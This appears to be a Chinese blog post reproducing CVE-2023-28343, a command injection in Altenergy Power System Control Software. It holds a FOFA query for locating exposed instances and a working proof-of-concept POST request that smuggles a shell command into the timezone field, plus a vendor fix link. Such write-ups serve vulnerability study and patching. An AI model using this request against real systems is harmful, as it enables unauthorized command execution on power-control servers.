Altenergy电力系统控制软件 RCE漏洞复现(CVE-2023-28343)

0x01 产品简介

Altenergy Power System Control Software是Altenergy Power System推出的一款微型逆变器控制软件。

0x02 漏洞概述

Altenergy Power System Control Software C1.2.5版本存在安全漏洞,该系统/set_timezone存在操作系统命令注入漏洞,攻击者可执行任意命令获取服务器权限。

0x03 复现环境

FOFA:title="Altenergy Power Control Software"

0x04 漏洞复现

PoC

POST /index.php/management/set_timezone HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

timezone=`id > rce.txt`

验证

0x05 修复建议 

目前厂商已发布修复措施解决此安全问题,建议使用此软件的用户参考网址获取解决方案:https://apsystems.com/。

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-09 03:38:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-09 03:38:02       101 阅读
  3. 在Django里面运行非项目文件

    2023-12-09 03:38:02       82 阅读
  4. Python语言-面向对象

    2023-12-09 03:38:02       91 阅读

热门阅读

  1. vue3 setup router的使用教程

    2023-12-09 03:38:02       74 阅读
  2. NVMe Over Fabrics with iRDMA总结 - 1

    2023-12-09 03:38:02       59 阅读
  3. CSS结构伪类选择器之否定伪类:not()

    2023-12-09 03:38:02       60 阅读
  4. BLUE引擎开始游戏没反应如何解决

    2023-12-09 03:38:02       69 阅读
  5. oracle 19c创建db_link名称带.com域名问题处理

    2023-12-09 03:38:02       60 阅读
  6. C++ Primer Plus第十四章笔记

    2023-12-09 03:38:02       43 阅读